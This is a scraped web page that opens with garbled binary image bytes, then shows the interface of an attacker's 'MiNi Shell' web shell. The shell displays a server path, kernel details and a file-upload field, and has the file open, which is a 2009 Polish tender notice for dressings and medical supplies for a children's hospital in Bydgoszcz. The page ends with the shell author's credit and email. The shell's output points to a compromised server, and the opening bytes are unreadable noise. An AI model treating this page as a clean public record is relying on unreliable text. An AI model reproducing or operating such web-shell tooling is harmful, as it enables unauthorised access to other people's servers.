JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090102/1061-N-2009.html

<p class="kh_header"><b>Bydgoszcz: dostaw środków opatrunkowych i innych materiałów medycznych w ilości i asortymencie wg Załącznika nr 2 do SIWZ dla Wojewódzkiego Szpitala Dziecięcego w Bydgoszczy</b><br>
<b>Numer ogłoszenia: 1061 - 2009; data zamieszczenia: 02.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Dziecięcy im. J.Brudzińskiego , ul. Chodkiewicza 44, 85-667 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3262100, faks 052 3262101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wsd.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostaw środków opatrunkowych i innych materiałów medycznych w ilości i asortymencie wg Załącznika nr 2 do SIWZ dla Wojewódzkiego Szpitala Dziecięcego w Bydgoszczy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy: środków opatrunkowych i innych materiałów medycznych, pogrupowanych w pakietach -  w ilości i asortymencie określonym w Formularzu cenowym- zał. nr 2 do SIWZ:
Pakiet nr 1 -Opatrunki I ( CPV 33141110-4)
Pakiet nr 2 -Opatrunki II ( CPV 33141110-4)
Pakiet nr 3 -Opatrunki III ( CPV 33141111-1)
Pakiet nr 4 -Opatrunki IV ( CPV 33141110-4)
Pakiet nr 5 -Opatrunki V (CPV 3314111-1)
Pakiet nr 6 -Opatrunki VI (33141110-4)
Pakiet nr 7 -Opatrunki VII (3314111-1)
Pakiet nr 8 -Opatrunki hemostatyczne pozycje: poz.1,poz.2,poz.3,poz.4 (33141127-6)
Pakiet nr 9 -Materiały medyczne: maseczki, ochraniacze, czepki, fartuchy (CPV 33199000-1)
Pakiet nr10 -Maski ochronne (CPV 33199000-1).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.11-1, 33.14.11.27-6, 33.19.90.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O zamówienie mogą ubiegać się wykonawcy którzy :
a)spełniają  warunki zawarte w art. 22 ust. 1 ustawy Pzp:
-posiadają uprawnienia do wykonywania działalności lub czynności, będącej przedmiotem zamówienia;
-posiadają niezbędną wiedzę i doświadczenie  do wykonania zamówienia;
-dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
-znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
b)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego ( art. 24 ust.1 i 2 ustawy Pzp)
2. Ocena spełniania warunków udziału w postępowania zostanie dokonana wg formuły: spełnia- nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Pzp należy dołączyć do oferty następujące dokumenty i oświadczenia:
a)Aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej 
( wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert),
b)Oświadczenie, że wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust.1  i nie podlega wykluczeniu na podstawie art. 24 ust.1 i 2 ustawy - Załącznik nr 3, 
1.W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego należy dołączyć:
a)deklarację zgodności CE lub świadectwo dopuszczenia do obrotu, świadectwo dopuszczenia do stosowania lub pozytywną opinię o wyrobie medycznym ( zgodnie z art. 4 i 5 Ustawy z dnia 20 kwietnia 2004r. o wyrobach medycznych Dz. U. z 2004 r. Nr 93, poz. 896 z późn. zm. ). 
b)Próbki wyrobów medycznych oferowanych w następujących pakietach:
Pakiet nr 1 -  Opatrunki I   - min. po 1 sztuce dla każdej pozycji
Pakiet nr 2 - Opatrunki II  - min. po 1 sztuce dla każdej pozycji
Pakiet nr 3 - Opatrunki III - min. po 1 sztuce dla każdej pozycji
Pakiet nr 4 - Opatrunki IV - poz. 1,2,4,5,6,7,8,9 min. po 1 sztuce 
Pakiet nr 5 - Opatrunki V  - min. po 1 sztuce dla każdej pozycji
Pakiet nr 6 - Opatrunki VI - min. po 1 sztuce dla każdej pozycji
Pakiet nr 8 - Opatrunki Hemostatyczne - poz. 1,2 min. po 1 sztuce 
Pakiet nr 9 - Materiały medyczne - po 1 sztuce dla każdej pozycji
Pakiet nr 10 - Maski ochronne - po 1 sztuce dla każdej pozycji

c)Opisy (załączone odpowiednie katalogi, materiały źródłowe producenta, ulotki itp ), potwierdzające że oferowany sprzęt spełnia wymagania Zamawiającego zawarte w poszczególnych pakietach. 

UWAGA! Wszystkie dokumenty, opisy wymagane w ust. 2 składane dla  potwierdzenia wymagań w poszczególnych pakietach, należy oznaczyć numerem pakietu, pozycji - do których się odnoszą.

3.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej:
-zamiast dokumentów, o których mowa w ust.1 lit. a)- składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości (dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu  składania ofert),
3.1.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce   zamieszkania, nie wydaje się dokumentu, o którym mowa w ust. 3, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Terminy ważności tych dokumentów jak powyżej.
4.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia ( np. jako konsorcjum, spółka cywilna i inne). W takim przypadku ich oferta musi spełniać następujące wymagania:
a)Każdy z wykonawców musi z osobna przedłożyć wymagane dokumenty, o których mowa w ust. 1 pkt a), ust. 3 i ust. 3.1, na potwierdzenie posiadania uprawnień do wykonywania określonej przedmiotem zamówienia działalności,
b)Wykonawcy mogą przedłożyć wspólnie oświadczenie o spełnianiu warunków udziału w postępowaniu, o którym mowa ust. 1 pkt  b) oraz dokumenty i próbki, o którym mowa w ust. 2 lit. a), b), c),
c)Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców występujących wspólnie,
d)Wykonawcy muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz do zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego, 
UWAGA! Treść pełnomocnictwa powinna dokładnie określać zakres umocowania,
e)Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem, 
f)Wypełniając formularz ofertowy: w miejscach: nazwa i adres wykonawcy, NIP, tel. należy wpisać dane dotyczące wszystkich wykonawców.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - OKRES UTRZYMANIA CENY - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wsd.org.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Dziecięcy im.J.Brudzińskiego w Bydgoszczy ul.Chodkiewicza 44,
- budynek D I piętro p.17(zamówienia publiczne).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.01.2009 godzina 09:45, miejsce: siedziba zamawiającego, ul. Chodkiewicza 44,  Bydgoszcz, budynek D, 
I piętro (sekretariat Dyrektora )..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opatrunki I.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> w pakiecie nr 1 -6 pozycji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. okres utrzymania ceny - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opatrunki II.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> w pakiecie nr 2- 9 pozycji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opatrunki III.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> w pakiecie nr 3 - 13 pozycji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.11-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. okres utrzymania ceny - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Opatrunki IV.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> w pakiecie nr 4 -11 pozycji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. okres utrzymania ceny - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Opatrunki V.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> w pakiecie nr 5 - 3 pozycje.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.11-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. okres utrzymania ceny - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Opatrunki VI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> w pakiecie nr 6 -11 pozycji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. okres utrzymania ceny - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Opatrunki VII.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> w pakiecie nr 7 - 3 pozycji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.11-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. okres utrzymania ceny - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Opatrunki hemostatyczne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pakiet nr 8 poz.1- OPATR. HEMOSTAT. - GĄBKA ŻELATYNOWA (typu:SPONGOSTAN).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.27-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. okres utrzymania ceny - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Opatrunki hemostatyczne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pakiet nr 8 poz.2- OPATR. HEMOSTAT. - GĄBKA ŻELATYNOWA (typu: SPONGOSTAN).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.27-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. okres utrzymania ceny - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Opatruhki hemostatyczne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pakiet nr 8 poz. 3 -OPATRUNEK CHIRURGICZNY DO SZYBKIEJ HEMOSTAZY, ODTWARZANIA INTEGRALNOŚCI TKANEK (Z FIBRYNOGENEM I TROMBINĄ).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.27-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. okres utrzymania ceny - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Opatruhki hemostatyczne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pakiet nr 8 poz.4-TISSUE GLUE.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.27-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. okres utrzymania ceny - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> MATERIAŁY MED. (FARTUCHY, CZEPKI, OCHRANIACZE).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> w pakiecie nr 9 -6 pozycji.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. okres utrzymania ceny - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> MASKI OCHRONNE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> w pakiecie nr 10-  2 pozycje.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. okres utrzymania ceny - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com